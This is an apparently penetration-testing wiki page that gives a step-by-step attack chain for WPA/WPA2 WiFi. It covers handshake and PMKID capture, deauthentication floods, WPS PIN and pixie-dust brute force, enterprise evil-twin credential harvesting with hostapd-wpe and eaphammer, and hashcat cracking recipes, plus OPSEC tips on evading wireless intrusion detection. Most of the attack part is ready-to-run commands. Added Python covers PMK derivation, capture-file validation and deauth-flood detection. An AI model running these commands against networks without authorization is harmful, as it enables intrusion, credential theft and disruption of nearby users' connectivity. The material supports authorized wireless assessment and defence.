# WPA/WPA2 Cracking

## Overview
WPA and WPA2 (Wi-Fi Protected Access) remain the most common WiFi security protocols. WPA2-PSK (Pre-Shared Key) is vulnerable to offline dictionary attacks after capturing either a 4-way handshake or a PMKID. Enterprise WPA2 using 802.1X is vulnerable to EAP downgrade and evil twin attacks. WPS (Wi-Fi Protected Setup) adds another attack surface with PIN brute-force vulnerabilities.
This guide covers the complete attack chain from capture to cracking. For PMKID-specific attacks, see PMKID Attack. For WPA3/SAE attacks, see WPA3 Attacks. For enterprise 802.1X attacks, see 802.1X Attacks.
## Attack Decision Tree

```text
WPA/WPA2 Target Identified
        |
        v
Is it Personal (PSK) or Enterprise (802.1X)?
        |
        |-- PSK
        |    |-- PMKID available? --> [PMKID Attack](pmkid-attack.md) (preferred, no deauth)
        |    |-- Connected clients? --> Capture 4-way handshake (this page)
        |    |-- WPS enabled? --> WPS PIN Attack (this page)
        |    |-- No clients, no PMKID --> Client attack / evil twin
        |
        |-- Enterprise (802.1X)
             |-- See [802.1X Attacks](../network-segmentation/8021x-attacks.md)
             |-- PEAP/GTC downgrade --> [Evil Twin](evil-twin-and-rogue-ap.md)
             |-- EAP-TLS --> Certificate theft or forgery
```
## Method 1: 4-Way Handshake Capture + Dictionary Attack
The classic WPA2-PSK attack — capture the 4-way EAPOL handshake, then crack offline.
### Step 1: Monitor Mode and Target Selection

```bash
# Start monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Identify target
sudo airodump-ng wlan0mon --encrypt wpa
```
### Step 2: Targeted Capture

```bash
# Lock to target channel and BSSID
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP_MAC> --write wpa-target

# Watch for "WPA handshake: <AP_MAC>" in the top-right of airodump-ng
# This indicates the handshake was captured
```
### Step 3: Deauthentication (If No Handshake Yet)

```bash
# Targeted deauth (specific client)
sudo aireplay-ng -0 5 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon

# Broadcast deauth (disconnects ALL clients -- use with caution)
sudo aireplay-ng -0 10 -a <AP_MAC> wlan0mon

# Continuous deauth until handshake captured
sudo aireplay-ng -0 0 -a <AP_MAC> wlan0mon   # 0 = infinite
```
### Step 4: Convert and Crack

```bash
# Convert capture to hashcat format
hcxpcapngtool -o wpa-target.hc22000 wpa-target-01.cap

# Basic dictionary attack
hashcat -m 22000 wpa-target.hc22000 /usr/share/wordlists/rockyou.txt

# With rules for mutation
hashcat -m 22000 wpa-target.hc22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rule

# Targeted attack (common SSID + password combos):
# preview the candidates a wordlist + rule set generates before spending GPU time
# (--stdout prints candidates only and takes no hash file)
hashcat --stdout wordlist.txt -r /usr/share/hashcat/rules/best64.rule | head
```
### Using aircrack-ng (Alternative)

```bash
# Older tool, still works for .cap files
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-target-01.cap
```
## Method 2: PMKID Capture
PMKID is a simpler and stealthier attack — no deauthentication needed, no client required. See PMKID Attack for the full guide.
```bash
# Capture PMKID
sudo hcxdumptool -i wlan0mon -o pmkid-capture.pcapng --active_bids=1

# Convert to hashcat format
hcxpcapngtool -o pmkid.hc22000 pmkid-capture.pcapng

# Crack
hashcat -m 22000 pmkid.hc22000 wordlist.txt
```
## Method 3: WPS PIN Attack

WPS (Wi-Fi Protected Setup) allows brute-forcing an 8-digit PIN. Because the AP validates the PIN in two halves, and the last digit of the second half is a checksum, the effective search space is only about 11,000 attempts (10^4 for the first half plus 10^3 for the second) rather than 10^8. This is often faster than a dictionary attack against a strong WPA2 passphrase.
### Reaver (WPS PIN Brute Force)

```bash
# Basic WPS attack
reaver -i wlan0mon -b <AP_MAC> -vv

# With specific channel
reaver -i wlan0mon -b <AP_MAC> -c <CH> -vv

# With delay (reduce detection)
reaver -i wlan0mon -b <AP_MAC> -d 5 -T 0.5 -vv

# Resume interrupted session
reaver -i wlan0mon -b <AP_MAC> -s /path/to/session/file -vv
```
### Pixie Dust Attack

Faster than a full PIN brute force; it exploits a WPS protocol vulnerability present in some APs.

```bash
# Pixie dust attack (much faster if AP is vulnerable)
reaver -i wlan0mon -b <AP_MAC> -K 1 -vv

# Using bully (alternative)
bully wlan0mon -b <AP_MAC> -d -v 3
```
### Bully (Alternative WPS Tool)

```bash
# Basic WPS attack with bully
bully wlan0mon -b <AP_MAC> -c <CH> -v 3

# Pixie dust with bully
bully wlan0mon -b <AP_MAC> -d -v 3

# Custom PIN range
bully wlan0mon -b <AP_MAC> --pinstart 00000000 --pinend 99999999 -v 3
```
### WPS Lockout Considerations
| AP Behavior | Lockout | Recovery Time |
|---|---|---|
| No lockout | None | N/A |
| Temporary lockout | After 3–10 failed attempts | 1–60 minutes |
| Permanent lockout | After N failed attempts | AP reboot required |
| WPS disabled | After lockout | Manual re-enable |
```bash
# Check if WPS is locked
wash -i wlan0mon -C -s

# If locked, wait and retry, or try a different approach
```
## Method 4: Enterprise WPA2-802.1X Attacks
Enterprise WPA2 uses 802.1X authentication (EAP-TLS, PEAP, EAP-TTLS, etc.). The primary attacks are EAP downgrade and evil twin credential harvesting. See 802.1X Attacks for full details.
### Quick Reference: EAP Downgrade with hostapd-wpe

```bash
# Set up evil twin with PEAP/GTC downgrade
# See [Evil Twin & Rogue AP](evil-twin-and-rogue-ap.md) for full setup
hostapd-wpe hostapd-wpe.conf

# Capture MS-CHAPv2 credentials in /tmp/hostapd-wpe.log
```
### Quick Reference: eaphammer

```bash
# Enterprise evil twin with credential harvesting
eaphammer --interface wlan0 \
    --essid "<Corporate-SSID>" \
    --channel <CH> \
    --auth peap \
    --wpa 2
```
## Hashcat Attack Modes Reference
| Hash Mode | Type | Hashcat Flag |
|---|---|---|
| WPA-PBKDF2 | PMKID/handshake | -m 22000 |
| WPA-PMK | Pre-computed PMK | -m 22001 |
| WPA-PBKDF2 (legacy .hc format) | Older format | -m 2500 (deprecated) |
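The table distinguishes `-m 22000` (hashcat derives the PMK from each passphrase candidate) from `-m 22001` (the 32-byte PMK is supplied directly). The derivation in question is the one every WPA/WPA2-PSK supplicant performs: PMK = PBKDF2-HMAC-SHA1(passphrase, salt = SSID, 4096 iterations, 32 bytes). The following Python is an added illustration, not code from this page or from hashcat; it reproduces the IEEE 802.11 Annex J test vector (passphrase `password`, SSID `IEEE`), shows that the SSID acts as a salt, and gives a rough feel for why each candidate is expensive. The passphrase strings used for timing are constructed here.

```python
import hashlib
import time

# Test vector from IEEE Std 802.11 Annex J (pass-phrase to PSK mapping).
IEEE_VECTOR = {
    "passphrase": "password",
    "ssid": "IEEE",
    "pmk_hex": "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e",
}


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).

    This is the per-candidate work hashcat -m 22000 performs; -m 22001 skips it
    by accepting the 32-byte PMK directly.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA-PSK passphrases are 8 to 63 characters")
    if not all(32 <= ord(c) <= 126 for c in passphrase):
        raise ValueError("WPA-PSK passphrases are printable ASCII")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, dklen=32
    )


def pmk_depends_on_ssid(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """Same passphrase, different SSID -> different PMK, because the SSID is the salt.

    This is why a precomputed PMK list (-m 22001 input) is only valid for one SSID.
    """
    return derive_pmk(passphrase, ssid_a) != derive_pmk(passphrase, ssid_b)


def measure_derivations_per_second(samples: int = 50) -> float:
    """Rough single-core PBKDF2 rate; the 4096 iterations are what make each
    guess costly compared with an unsalted, single-round hash."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"candidate{i:08d}", "IEEE")  # constructed candidates
    return samples / (time.perf_counter() - start)


if __name__ == "__main__":
    pmk = derive_pmk(IEEE_VECTOR["passphrase"], IEEE_VECTOR["ssid"])
    print("PMK:", pmk.hex())
    print("matches IEEE vector:", pmk.hex() == IEEE_VECTOR["pmk_hex"])
    print("SSID-bound:", pmk_depends_on_ssid("password", "IEEE", "IEEE-Guest"))
    print(f"~{measure_derivations_per_second():.0f} PBKDF2 derivations/s on one CPU core")
```

The single-core rate printed at the end is orders of magnitude below what a GPU achieves, which is exactly the gap the `-m 22000` tooling exists to close; the only defender-side variable in this derivation is passphrase entropy, since the iteration count and salt are fixed by the standard.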
## Hashcat Best Practices

```bash
# 1. Start with common passwords
hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt

# 2. Apply rules for mutation
hashcat -m 22000 capture.hc22000 rockyou.txt \
    -r /usr/share/hashcat/rules/best64.rule \
    -r /usr/share/hashcat/rules/d3ad0ne.rule

# 3. Combinator attack (two wordlists)
hashcat -m 22000 capture.hc22000 -a 1 wordlist1.txt wordlist2.txt

# 4. Mask attack (patterns like Company2024!, SeasonMonth)
hashcat -m 22000 capture.hc22000 -a 3 '?u?l?l?l?d?d?d?d?s'

# 5. Session management (long-running attacks)
hashcat -m 22000 capture.hc22000 wordlist.txt --session wpa-crack
hashcat --session wpa-crack --restore   # Resume

# 6. Show cracked results
hashcat -m 22000 capture.hc22000 --show
```
## Troubleshooting
| Problem | Cause | Solution |
|---|---|---|
| No handshake captured | No clients connected | Use deauth or wait for reconnection |
| Handshake captured but won't crack | Weak wordlist | Try larger wordlist or rules |
| "Mixed" handshake | Multiple BSSIDs | Specify --bssid in airodump-ng |
| Channel hopping | Monitor mode not fixed to channel | Use --channel <CH> in airodump-ng |
| Adapter not injecting | Driver doesn't support injection | Use Alfa AWUS036ACH or similar |
| hcxdumptool fails | Adapter doesn't support required features | Try different adapter or use airodump-ng |
## Common Pitfalls
- Weak wordlist: The #1 reason WPA2 cracking fails. Use large, targeted wordlists (rockyou.txt, SecLists, mentalist-generated).
- Incorrect channel: Always lock to the target channel. Channel hopping misses handshakes.
- Capture corruption: Use hcxpcapngtool to validate captures — it reports how many handshakes/PMKIDs were found.
- WPA3 transition mode: Modern APs may advertise both WPA2 and WPA3. Focus on the WPA2 handshake.
- MFP (802.11w): If Management Frame Protection is required, deauthentication won't work. Use PMKID capture instead.
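The "capture corruption" pitfall above is best caught by inspecting the converted `.hc22000` file itself, since a capture can contain a handshake that looks complete but whose client never actually authenticated. The following Python is an added example, not code from this page or from hcxtools; it parses the hashcat 22000 record layout (`WPA*TYPE*PMKID-or-MIC*MAC_AP*MAC_CLIENT*ESSID*ANONCE*EAPOL*MESSAGEPAIR`, TYPE `01` = PMKID, `02` = EAPOL), validates field widths, and summarises per ESSID how many PMKIDs and EAPOL pairs were found and whether any pair came from an authorized client (only the low three bits of MESSAGEPAIR are decoded; the higher tool-specific flag bits are left alone). The sample records are constructed with placeholder hex, not taken from a real capture.

```python
from collections import defaultdict

# Low 3 bits of the MESSAGEPAIR field (hashcat 22000 format). Pair 0 (M1+M2)
# only proves a client *attempted* a passphrase, which hashcat labels "challenge";
# the AP may have rejected it. The other pairs require a client the AP accepted.
MESSAGE_PAIRS = {
    0: "M1+M2 (challenge)",
    1: "M1+M4 (authorized)",
    2: "M2+M3 (authorized)",
    3: "M2+M3 (authorized)",
    4: "M3+M4 (authorized)",
    5: "M3+M4 (authorized)",
}
HEX = set("0123456789abcdefABCDEF")


def parse_hc22000_line(line: str) -> dict:
    """Parse one WPA*01 (PMKID) or WPA*02 (EAPOL) record; raise ValueError if malformed."""
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA" or fields[1] not in ("01", "02"):
        raise ValueError(f"not a WPA*01/02 record: {line[:40]!r}")
    kind, mic, mac_ap, mac_client, essid_hex, anonce, eapol, mp = fields[1:]
    for name, value, width in (("PMKID/MIC", mic, 32), ("MAC_AP", mac_ap, 12), ("MAC_CLIENT", mac_client, 12)):
        if len(value) != width or not set(value) <= HEX:
            raise ValueError(f"{name} must be {width} hex chars, got {value!r}")
    rec = {
        "type": "pmkid" if kind == "01" else "eapol",
        "mac_ap": mac_ap.lower(),
        "mac_client": mac_client.lower(),
        "essid": bytes.fromhex(essid_hex).decode("utf-8", errors="replace"),
    }
    if kind == "02":
        if len(anonce) != 64 or not eapol:
            raise ValueError("EAPOL record needs a 32-byte ANONCE and an EAPOL payload")
        pair = int(mp, 16) & 0x07
        rec["message_pair"] = MESSAGE_PAIRS.get(pair, f"unknown ({pair})")
        rec["authorized"] = pair != 0
    return rec


def summarize_capture(lines):
    """Per-ESSID counts of PMKIDs, EAPOL pairs and authorized pairs; malformed lines
    are returned as (line_number, reason) instead of silently dropped."""
    summary = defaultdict(lambda: {"pmkid": 0, "eapol": 0, "authorized": 0, "clients": set()})
    errors = []
    for n, line in enumerate(lines, 1):
        if not line.strip():
            continue
        try:
            rec = parse_hc22000_line(line)
        except ValueError as exc:
            errors.append((n, str(exc)))
            continue
        entry = summary[rec["essid"]]
        entry[rec["type"]] += 1
        entry["clients"].add(rec["mac_client"])
        if rec.get("authorized"):
            entry["authorized"] += 1
    return dict(summary), errors


# Constructed sample records (placeholder hex, not from a real capture).
ESSID_HEX = "TestNet".encode().hex()
EAPOL_HEX = "0103007502010a00" + "00" * 108
SAMPLE_LINES = [
    "WPA*01*" + "11" * 16 + "*aabbccddeeff*001122334455*" + ESSID_HEX + "***",
    "WPA*02*" + "22" * 16 + "*aabbccddeeff*001122334455*" + ESSID_HEX + "*" + "33" * 32 + "*" + EAPOL_HEX + "*02",
    "WPA*02*" + "44" * 16 + "*aabbccddeeff*66778899aabb*" + ESSID_HEX + "*" + "55" * 32 + "*" + EAPOL_HEX + "*00",
    "WPA*01*deadbeef*aabbccddeeff*001122334455*" + ESSID_HEX + "***",  # truncated PMKID
]

if __name__ == "__main__":
    summary, errors = summarize_capture(SAMPLE_LINES)
    for essid, s in summary.items():
        print(f"{essid}: {s['pmkid']} PMKID, {s['eapol']} EAPOL pairs "
              f"({s['authorized']} authorized), {len(s['clients'])} clients")
    for n, reason in errors:
        print(f"line {n}: {reason}")
```

A file whose only EAPOL pairs are `M1+M2 (challenge)` deserves suspicion before a long cracking run: the candidate that produced that MIC may not be the network's real passphrase at all.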
## OPSEC Considerations
- Deauthentication frames are logged by enterprise WIDS/WIPS (Cisco MSE, Aruba AirWave, etc.)
- WPS brute force creates thousands of association attempts — extremely noisy
- Evil twin APs appear as duplicate SSIDs, which trained staff may notice
- Hashcat GPU utilization is visible to endpoint monitoring
- Always verify timing windows with the engagement scope — avoid peak business hours for deauth attacks
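The first OPSEC point, that deauthentication frames are logged by WIDS/WIPS, rests on a simple detection: legitimate disconnects are rare and isolated, while an injected deauth run arrives as a burst, usually to the broadcast address with one repeated reason code. The following Python is an added example of that detection logic, written from the monitoring side; it is not code from this page or from any WIDS product. Frame records are a constructed in-memory sample rather than a real capture, and the `MgmtFrame` structure, window size and threshold are assumptions chosen for illustration.

```python
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Iterable

BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass(frozen=True)
class MgmtFrame:
    """Minimal 802.11 management-frame record (assumed shape, not a real pcap type)."""
    ts: float        # capture timestamp, seconds
    subtype: str     # "deauth", "disassoc", "beacon", ...
    src: str         # transmitter address
    dst: str         # receiver address
    bssid: str
    reason: int = 0  # 802.11 reason code, meaningful for deauth/disassoc only


def detect_deauth_floods(frames: Iterable[MgmtFrame], window_s: float = 10.0, threshold: int = 8):
    """Sliding-window count of deauth/disassoc frames per BSSID.

    One alert is raised per BSSID the first time `threshold` or more such frames
    fall inside `window_s` seconds. The alert records whether the broadcast
    address was targeted and which reason codes appeared, both useful for
    telling an injected flood from ordinary roaming.
    """
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for f in sorted(frames, key=lambda x: x.ts):
        if f.subtype not in ("deauth", "disassoc"):
            continue
        q = recent[f.bssid]
        q.append(f)
        while q and f.ts - q[0].ts > window_s:
            q.popleft()
        if len(q) >= threshold and f.bssid not in alerted:
            alerted.add(f.bssid)
            alerts.append({
                "bssid": f.bssid,
                "count": len(q),
                "window": (q[0].ts, f.ts),
                "broadcast": any(x.dst == BROADCAST for x in q),
                "reasons": sorted({x.reason for x in q}),
                "targets": sorted({x.dst for x in q}),
            })
    return alerts


# Constructed sample traffic (not a real capture): one ordinary disconnect on AP_A,
# then a burst of broadcast deauth frames carrying AP_B's address.
AP_A, AP_B = "02:00:00:00:0a:01", "02:00:00:00:0b:02"
SAMPLE_FRAMES = [
    MgmtFrame(0.0, "beacon", AP_A, BROADCAST, AP_A),
    MgmtFrame(3.5, "deauth", AP_A, "02:00:00:00:c1:01", AP_A, reason=3),  # station leaving
    MgmtFrame(60.0, "beacon", AP_B, BROADCAST, AP_B),
] + [
    MgmtFrame(100.0 + 0.1 * i, "deauth", AP_B, BROADCAST, AP_B, reason=7)
    for i in range(12)
]

if __name__ == "__main__":
    for a in detect_deauth_floods(SAMPLE_FRAMES):
        span = a["window"][1] - a["window"][0]
        print(f"ALERT bssid={a['bssid']} {a['count']} deauth/disassoc in {span:.1f}s "
              f"broadcast={a['broadcast']} reasons={a['reasons']}")
```

The threshold and window are tuning knobs: a busy enterprise AP will see more legitimate disconnects than a home router, so a defender would calibrate both against a baseline before alerting, and would treat broadcast-addressed bursts as the highest-confidence signal.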
## Cross-References
- PMKID Attack — Stealthier alternative to handshake capture
- Deauthentication Attacks — Detailed deauth techniques
- Evil Twin & Rogue AP — Enterprise credential harvesting
- WPA3 Attacks — Modern WPA3/SAE attacks
- 802.1X Attacks — Enterprise authentication exploitation
## Tool References
| Tool | Purpose | Link |
|---|---|---|
| aircrack-ng suite | Capture, deauth, crack | https://www.aircrack-ng.org/ |
| hcxdumptool / hcxtools | PMKID capture, hash conversion | https://github.com/ZerBea/hcxtools |
| hashcat | GPU hash cracking | https://hashcat.net/hashcat/ |
| reaver | WPS PIN brute force | https://github.com/t6x/reaver-wps-fork |
| bully | WPS PIN attack (alternative) | https://github.com/aanarchy99/bully |
| eaphammer | Enterprise evil twin | https://github.com/s0lst1c3/eaphammer |
| hostapd-wpe | Rogue AP with credential logging | https://github.com/OpenSecurityResearch/hostapd-wpe |
| wifite2 | Automated WiFi audit | https://github.com/derv82/wifite2 |
## Source Machines
- No specific HTB machines for WPA2-PSK cracking (requires physical wireless assessment)
- Enterprise 802.1X attacks applicable to AD environments — see 06 - Exploitation & Foothold